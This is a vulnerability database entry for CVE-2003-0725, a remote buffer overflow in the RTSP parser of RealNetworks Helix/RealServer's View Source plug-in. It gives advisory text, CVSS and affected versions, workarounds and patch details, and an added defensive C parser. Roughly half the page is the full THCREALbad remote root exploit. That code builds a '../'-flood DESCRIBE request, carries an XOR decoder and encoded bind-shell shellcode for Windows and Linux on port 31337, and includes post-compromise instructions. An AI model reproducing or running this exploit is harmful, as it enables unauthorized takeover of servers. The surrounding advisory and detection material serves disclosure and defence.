CVE-2003-0725
CVSS 7.5
Published: 2003-10-20 00:00:00
Last revised: 2008-09-05 16:35:05

[Original] Buffer overflow in the RTSP protocol parser for the View Source plug-in (vsrcplin.so or vsrcplin3260.dll) for RealNetworks Helix Universal Server 9 and RealSystem Server 8, 7 and RealServer G2 allows remote attackers to execute arbitrary code.


[CNNVD] Real Networks Helix Universal Server Remote Buffer Overflow Vulnerability (CNNVD-200310-053)

        
        Helix Universal Server is a multi-format media server developed and maintained by RealNetworks.
        Helix Universal Server has a flaw in the implementation of its 'View Source' plug-in. A remote attacker can exploit it to execute arbitrary instructions on the system with the privileges of the server process; since the service is commonly run as root on Unix installs, the public exploit describes it as a remote root compromise.
        The problem lies in the 'View Source' plug-in, which reads and displays the format headers of media files. When certain characters (such as '.') appear in very large numbers in a request URL, the RTSP protocol parser overflows a buffer while handling the URL. No authentication is needed: a single crafted DESCRIBE request on the RTSP port (TCP 554) is enough, and the overflow can be steered into arbitrary code execution with the privileges of the server process.
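The overflow described above is the classic fixed-buffer path copy in a request parser. The following C program is an added example written for this page; it is not RealNetworks code and not the Helix parser, whose internals are not given here. It parses an RTSP request line with bounded copies, rejects a URI that would not fit the destination buffer, and flags a URI made mostly of "../" segments, which is the shape of the public THCREALbad payload (DESCRIBE prefix, repeated "../", ".smi RTSP/1.0" suffix, and nothing else; no shellcode is included). The buffer sizes, the 255-byte URI limit, the 8-segment traversal limit and the sample requests are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed limits for the illustration; not values from the advisory. */
#define RTSP_METHOD_MAX   16
#define RTSP_URI_MAX      255
#define RTSP_MAX_DOTDOT   8

enum rtsp_verdict {
    RTSP_OK = 0,
    RTSP_BAD_SYNTAX,      /* not "METHOD SP URI SP RTSP/x.y CRLF" */
    RTSP_URI_TOO_LONG,    /* would not fit the bounded URI buffer */
    RTSP_TRAVERSAL_FLOOD  /* more "../" segments than any real URI needs */
};

struct rtsp_request_line {
    char method[RTSP_METHOD_MAX + 1];
    char uri[RTSP_URI_MAX + 1];
    char version[12];
};

/* Count "../" segments in the first len bytes of s. */
static size_t count_dotdot(const char *s, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i + 2 < len; i++)
        if (s[i] == '.' && s[i + 1] == '.' && s[i + 2] == '/')
            n++;
    return n;
}

/*
 * Hardened request-line parser: every copy is bounded by the destination
 * size, and the URI is rejected before anything is copied if it is too
 * long or is built almost entirely from "../" segments.
 */
enum rtsp_verdict parse_rtsp_request_line(const char *req, struct rtsp_request_line *out)
{
    const char *eol = strstr(req, "\r\n");
    size_t line_len = eol ? (size_t)(eol - req) : strlen(req);

    const char *sp1 = memchr(req, ' ', line_len);
    if (!sp1) return RTSP_BAD_SYNTAX;
    size_t method_len = (size_t)(sp1 - req);

    const char *uri = sp1 + 1;
    size_t rest = line_len - method_len - 1;
    const char *sp2 = memchr(uri, ' ', rest);
    if (!sp2) return RTSP_BAD_SYNTAX;
    size_t uri_len = (size_t)(sp2 - uri);

    const char *ver = sp2 + 1;
    size_t ver_len = rest - uri_len - 1;

    if (method_len == 0 || method_len > RTSP_METHOD_MAX) return RTSP_BAD_SYNTAX;
    if (ver_len != 8 || strncmp(ver, "RTSP/", 5) != 0) return RTSP_BAD_SYNTAX;

    /* Length check first: the bounded copies below must never truncate silently. */
    if (uri_len == 0 || uri_len > RTSP_URI_MAX) return RTSP_URI_TOO_LONG;
    if (count_dotdot(uri, uri_len) > RTSP_MAX_DOTDOT) return RTSP_TRAVERSAL_FLOOD;

    memcpy(out->method, req, method_len); out->method[method_len] = '\0';
    memcpy(out->uri, uri, uri_len);       out->uri[uri_len] = '\0';
    memcpy(out->version, ver, ver_len);   out->version[ver_len] = '\0';
    return RTSP_OK;
}

/*
 * Build a constructed request with the same shape as the public exploit's
 * DESCRIBE payload (prefix, n "../" segments, ".smi RTSP/1.0") and no
 * decoder or shellcode. Returns 0 on success, -1 if it does not fit in buf.
 */
int build_traversal_request(char *buf, size_t cap, size_t n)
{
    const char *head = "DESCRIBE /";
    const char *tail = ".smi RTSP/1.0\r\n\r\n";
    size_t need = strlen(head) + 3 * n + strlen(tail) + 1;
    if (need > cap) return -1;
    char *p = buf;
    memcpy(p, head, strlen(head)); p += strlen(head);
    for (size_t i = 0; i < n; i++) { memcpy(p, "../", 3); p += 3; }
    memcpy(p, tail, strlen(tail) + 1);
    return 0;
}

int main(void)
{
    static const char *names[] = { "OK", "BAD_SYNTAX", "URI_TOO_LONG", "TRAVERSAL_FLOOD" };
    struct rtsp_request_line rl;
    char req[4096];

    /* Constructed benign request (assumed host name). */
    const char *benign = "DESCRIBE rtsp://media.example/clip.rm RTSP/1.0\r\nCSeq: 1\r\n\r\n";
    printf("benign:          %s\n", names[parse_rtsp_request_line(benign, &rl)]);

    /* 520 "../" segments: roughly the volume the public exploit sends. */
    build_traversal_request(req, sizeof req, 520);
    printf("exploit-shaped:  %s\n", names[parse_rtsp_request_line(req, &rl)]);

    /* Short enough to fit the buffer, but still far more traversal than any real path. */
    build_traversal_request(req, sizeof req, 20);
    printf("20 traversals:   %s\n", names[parse_rtsp_request_line(req, &rl)]);
    return 0;
}
```

Build with any C99 compiler (for example cc -std=c99 -Wall) and run it. The two rejections are deliberately separate: the length check is what a patched parser must do, while the traversal count is the cheap signature an IDS rule or a reverse proxy in front of port 554 can apply to spot this request shape even when the payload is short enough to fit.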
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [reduced performance or interrupted access to resources]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: [--]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:realnetworks:realserver:8.0
cpe:/a:realnetworks:helix_universal_server:8.0.1
cpe:/a:realnetworks:realserver:8.0_beta
cpe:/a:realnetworks:helix_universal_server:9.0
cpe:/a:realnetworks:realserver:8.0.2
cpe:/a:realnetworks:realserver:7.0.1
cpe:/a:realnetworks:helix_universal_server:9.0.2.794
cpe:/a:realnetworks:helix_universal_server:9.0.1
cpe:/a:realnetworks:realserver:7.0.2
cpe:/a:realnetworks:realserver:7.0
cpe:/a:realnetworks:realserver:g2_1.0
cpe:/a:realnetworks:realserver:8.0.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0725
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0725
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-053
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/934932
(VENDOR_ADVISORY)  CERT-VN  VU#934932
http://www.securityfocus.com/bid/8476
(VENDOR_ADVISORY)  BID  8476
http://www.service.real.com/help/faq/security/rootexploit082203.html
(UNKNOWN)  CONFIRM  http://www.service.real.com/help/faq/security/rootexploit082203.html
http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html
(UNKNOWN)  MISC  http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0087.html
(VENDOR_ADVISORY)  VULNWATCH  20030825 New Bug in RealServer

- Vulnerability information (CNNVD)

Real Networks Helix Universal Server Remote Buffer Overflow Vulnerability
Severity: High    Type: Boundary condition error
Published: 2003-10-20 00:00:00    Updated: 2006-01-05 00:00:00
Attack vector: Remote
        

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following to reduce the risk:
        * Remove the plug-in library from the /Plugins directory of the installation:
        UNIX/Linux: vsrcplin.so.9.0 (Helix Universal Server), vsrcplin.so.6.0 (RealSystem Server 8 and 7, and RealServer G2)
        Windows: vsrc3260.dll (the CVE description names the file vsrcplin3260.dll; remove whichever of the two is present in the Plugins directory)
        Restart the server afterwards so that the already-loaded library is unmapped. Removing this plug-in does not affect on-demand or live stream delivery, logging or authentication, but the content-browsing (View Source) function will no longer be available.
        Vendor patch:
        Real Networks
        -------------
        Real Networks Helix Universal Server 9.0.2.802 and later fix this vulnerability; the current release can be downloaded from the vendor's site:
        
        http://www.real.com

        RealServer 8.x customers must contact Real support to obtain a patch.
        Earlier RealServer versions are no longer supported.

- Vulnerability information (Exploit-DB 86)

Real Server 7/8/9 Remote Root Exploit (Windows & Linux) (EDBID:86)
Platform: multiple    Type: remote
Date: 2003-08-25    Verified
Port: 554    Author: Johnny Cyberpunk
/***************************************************************
 * THCREALbad 0.4 - Wind0wZ & Linux remote root exploit
 * Exploit by: Johnny Cyberpunk thehackerschoice
 * THC PUBLIC SOURCE MATERIALS
 *
 * http://www.service.real.com/help/faq/security/rootexploit082203.html
 *
 * After successful exploitation of a Linux box just type in the following
 * ps -ef | grep -i rmserver
 * and then search for the first appearing master pid of rmserver and type
 * kill -9 <master pid of rmserver>
 * Otherwise the master process detects that the compromised thread isn't
 * running in a stable state any longer and kicks you off the box.
 * On Windows Realservers it doesn't matter, the connection keeps up.
 *
 * Also try the testing mode before exploitation of this bug, what OS is
 * running on the remote site, to know what type of shellcode to use.
 *
 * Greetings go to Dave Aitel of Immunitysec who found that bug.
 *
 * compile with MS Visual C++ : cl THCREALbad.c
 ***************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#define WINDOWS 0
#define LINUX 1
#define OSTESTMODE 2

#pragma comment(lib, "ws2_32.lib")

/* Harmless RTSP OPTIONS request; the Server: header of the reply reveals the platform. */
char ostestmode[] = "OPTIONS / RTSP/1.0\r\n\r\n";

/* Request-line prefix: a DESCRIBE whose path is a flood of "../" segments.
   This is what overruns the buffer in the View Source plug-in's RTSP parser. */
char attackbuffer1[] =
"DESCRIBE /"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../";

/* Request-line suffix: file extension plus RTSP version and end of headers. */
char attackbuffer2[] =
".smi RTSP/1.0\r\n\r\n";

/* Single-byte XOR decoder stub for the payload that follows it.
   decoder[11] is the XOR key byte and is patched per target OS in main()
   (0x90 for the Windows payload, 0x05 for the Linux payload). */
char decoder[] =
"\xcc\xcc\x90\x8b\xfd\x83\xc7\x37\x33\xc9\xb2\x90\x66\x81\xc1"
"\x38\x01\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7";

/* XOR-encoded Linux payload: binds a shell on TCP port 31337. */
char linuxshell[] =
"\x36\xc5\x55\x6d\xfa\x07\x7f\x6c\x8c\xe2\x55\x6f\x04\x6f\x07"
"\x8c\xe4\xb5\x63\x34\xde\x46\xc8\x85\x6f\x15\x52\x55\x8c\xe4"
"\xb5\x63\x46\xc8\x85\xb5\x63\xb6\x01\x8c\x41\x21\x01\xc8\x85"
"\x36\xc5\x86\xc1\x09\x55\x55\xb5\x63\x46\xc8\x85\x8c\xc6\x34"
"\xcc\xb4\x06\x34\xc5\xb5\x3a\x4c\xc8\x85\x44\xe7\xf3\x34\xc5"
"\x55\x6d\x2a\x2a\x76\x6d\x6d\x2a\x67\x6c\x6b\x8c\xe6\x55\x56"
"\x8c\xe4\x9c\xb5\x0e\xc8\x85";

/* XOR-encoded Win32 payload: binds a shell on TCP port 31337. */
char w32shell[] =
"\x7b\xb3\xea\xf9\x92\x95\xfc\xc9\x68\x8d\x0c\x4e\x1c\x41\xdc"
"\xe0\x44\x93\x60\xb7\xb0\xb0\xa0\x98\xc7\xc3\xa2\xcf\xa3\xa2"
"\xbe\xd4\xdc\xdc\x91\x7b\x95\x78\x69\x6f\x6f\x6f\xcd\x13\x7d"
"\xba\xfa\xa0\xc9\xf4\x1b\x91\x1b\xd0\x9c\x1b\xe0\x8c\x3d\x1b"
"\xe8\x98\x1d\xcf\xac\x1b\x8b\x91\x6b\x1b\xcb\xe8\x91\x6b\x1b"
"\xdb\x8c\x91\x69\x1b\xc3\xb4\x91\x6a\xc3\xc1\xc2\x1b\xcb\xb0"
"\x91\x6b\xa1\x59\xd1\xa1\x50\x09\x1b\xa4\x1b\x91\x6e\x3c\xa1"
"\x52\x41\x72\x14\x50\xe5\x67\x9f\x26\xd5\x95\x1d\xd4\xd5\x94"
"\xf6\xa9\x80\xe5\x71\xf6\xa1\x80\xca\xc8\xce\xc6\xc0\xc2\xbb"
"\xde\x80\xd1\x9f\x27\x9c\xda\x1b\x94\x18\x91\x68\x9f\x26\xdd"
"\x95\x19\xd4\x1d\x48\x6e\xdd\x95\xe5\x2e\x6e\xdd\x94\xe4\xb1"
"\x6e\xdd\xb2\x1d\xcd\x88\xc3\x6f\x40\x19\x57\xfa\x94\xc8\x18"
"\xd5\x95\x10\xd5\xe7\x9a\x1d\xcd\xe4\x10\xfb\xb6\x84\x79\xe8"
"\x6f\x6f\x6f\x19\x5e\xa1\x4b\xc3\xc3\xc3\xc3\xc6\xd6\xc6\x6f"
"\x40\x07\xc5\xc8\xf6\x19\xa0\xfa\x80\xc5\xc7\x6f\xc5\x44\xde"
"\xc6\xc7\x6f\xc5\x5c\xc3\xc5\xc7\x6f\xc5\x40\x07\x1d\xd5\x18"
"\xc0\x6f\xc5\x74\xc5\xc5\x6f\xc5\x78\x1d\xd4\x95\x9c\x04\xc3"
"\xf8\xbe\xf5\xe8\xf5\xf8\xcc\xf3\xfd\xf4\x04\xa1\x42\x1d\xd5"
"\x5c\x04\xc7\xc7\xc7\xc3\xc3\x6e\x56\x91\x62\xc2\x04\x1d\xd5"
"\xe8\xc0\x1d\xd5\x18\xc0\x21\x98\xc3\xc3\xfa\x80\x6e\x5e\xc2"
"\xc3\xc3\xc3\xc5\x6f\xc5\x7c\xfa\x6f\x6f\xc5\x70";

void usage(void);

int main(int argc, char *argv[])
{
    unsigned short realport = 554;          /* RTSP control port */
    SOCKET sock;
    unsigned long addr = INADDR_NONE;
    unsigned int os;
    int rc;
    char *finalbuffer, *osbuf, *p;
    struct sockaddr_in mytcp;
    struct hostent *hp;
    WSADATA wsaData;

    printf("\nTHCREALbad v0.4 - Wind0wZ & Linux remote root sploit for Realservers 8+9\n");
    printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");

    if (argc != 3)
        usage();

    /* The request is always sent as one zero-padded 2000-byte block. */
    finalbuffer = malloc(2000);
    if (!finalbuffer)
    {
        printf("malloc failed\n");
        exit(-1);
    }
    memset(finalbuffer, 0, 2000);

    strcpy(finalbuffer, attackbuffer1);
    os = (unsigned short)atoi(argv[2]);
    switch (os)
    {
    case WINDOWS:
        decoder[11] = 0x90;     /* XOR key for w32shell */
        break;
    case LINUX:
        decoder[11] = 0x05;     /* XOR key for linuxshell */
        break;
    case OSTESTMODE:
        break;
    default:
        printf("\nillegal OS value!\n");
        exit(-1);
    }

    /* Layout on the wire: DESCRIBE + "../" flood + decoder + encoded payload + ".smi RTSP/1.0" */
    strcat(finalbuffer, decoder);

    if (os == WINDOWS)
        strcat(finalbuffer, w32shell);
    else
        strcat(finalbuffer, linuxshell);

    strcat(finalbuffer, attackbuffer2);

    if (WSAStartup(MAKEWORD(2, 1), &wsaData) != 0)
    {
        printf("WSAStartup failed !\n");
        exit(-1);
    }

    /* Accept either a host name or a dotted-quad address. */
    hp = gethostbyname(argv[1]);
    if (!hp)
        addr = inet_addr(argv[1]);
    if (!hp && addr == INADDR_NONE)
    {
        printf("Unable to resolve %s\n", argv[1]);
        exit(-1);
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET)
    {
        printf("socket() error...\n");
        exit(-1);
    }

    memset(&mytcp, 0, sizeof(mytcp));
    if (hp)
    {
        memcpy(&mytcp.sin_addr, hp->h_addr, hp->h_length);
        mytcp.sin_family = hp->h_addrtype;
    }
    else
    {
        mytcp.sin_addr.s_addr = addr;
        mytcp.sin_family = AF_INET;
    }
    mytcp.sin_port = htons(realport);

    rc = connect(sock, (struct sockaddr *)&mytcp, sizeof(struct sockaddr_in));
    if (rc == 0)
    {
        if (os == OSTESTMODE)
        {
            /* Fingerprint only: send OPTIONS and print the Server: header of the reply. */
            send(sock, ostestmode, (int)strlen(ostestmode), 0);
            Sleep(1000);
            osbuf = malloc(2000);
            if (!osbuf)
            {
                printf("malloc failed\n");
                exit(-1);
            }
            memset(osbuf, 0, 2000);
            recv(sock, osbuf, 1999, 0);     /* leave room for the terminating NUL */
            for (p = osbuf; *p != '\0'; p++)
            {
                if (strncmp(p, "Server:", 7) == 0)
                {
                    p += 7;
                    while (*p == ' ')
                        p++;
                    printf("\nDetected OS: ");
                    while (*p != '\0' && *p != '\r' && *p != '\n')
                        printf("%c", *p++);
                    printf("\n");
                    break;
                }
            }
            free(osbuf);    /* free the original pointer, not the cursor */
        }
        else
        {
            send(sock, finalbuffer, 2000, 0);
            printf("\nexploit send .... sleeping a while ....\n");
            Sleep(1000);
            printf("\nok ... now try to connect to port 31337 via netcat !\n");
        }
    }
    else
        printf("can't connect to realserver port!\n");

    shutdown(sock, SD_SEND);
    closesocket(sock);
    WSACleanup();
    free(finalbuffer);
    return 0;
}

void usage(void)
{
    printf("\nUsage: <Host> <OS>\n");
    printf("0 = Wind0wZ\n");
    printf("1 = Linux\n");
    printf("2 = OS Test Mode\n");
    exit(0);
}

// milw0rm.com [2003-08-25]
		

- Vulnerability information (OSVDB)

11772
RealNetworks Helix Universal Server View Source Plug-in RTSP Parser Overflow
Classification: Input Manipulation
Impact: Loss of Integrity
Exploit: Public, Commercial

- Vulnerability description

Unknown or Incomplete

- Timeline

Disclosure date: 2003-08-22 (other dates unknown)

- Solution

Unknown or Incomplete

- References

- Credit

Unknown or Incomplete

- Vulnerability information (SecurityFocus BID)

Real Networks Helix Universal Server Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error    BID: 8476
Remote: Yes    Local: No
Published: 2003-08-22 12:00:00    Updated: 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Dave Aitel of Immunity, Inc.

- Affected program versions

Real Networks Real Server 8.0 Beta
Real Networks Real Server 8.0 2
Real Networks Real Server 8.0 1
Real Networks Real Server 8.0
Real Networks Real Server 7.0.2
Real Networks Real Server 7.0.1
Real Networks Real Server 7.0
Real Networks Real Server 6.0 x
Real Networks Real Server 5.0
Real Networks Helix Universal Server 9.0.2 .794
Real Networks Helix Universal Server 9.0 1
Real Networks Helix Universal Server 9.0
Real Networks Helix Universal Server 8.0 1
Real Networks GameHouse dldisplay ActiveX control 0

- Unaffected program versions

Real Networks Helix Universal Server 9.0.2 .802

- Vulnerability discussion

Real Networks has announced that a vulnerability is present in Helix Universal Server version 9 and prior that will allow for attackers to compromise servers. The vulnerability is related to the "View Source" plug-in.

Note: The announcement by RealNetworks may be related to issues reported earlier by Symantec (possibly BIDs 7020, 6454, 6458 or 6456). This has not been confirmed. If this is the case, this BID will be retired.

- Exploit

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit has been developed by Johnny Cyberpunk of TheHackersChoice (www.thc.org).

An exploit (realserver_describe_linux.pm) has been released as part of the Metasploit Framework 2.0.

- Solution

RealNetworks has released Helix Universal Server 9.0.2.802 to address this vulnerability. Users should contact the vendor to obtain upgrades.
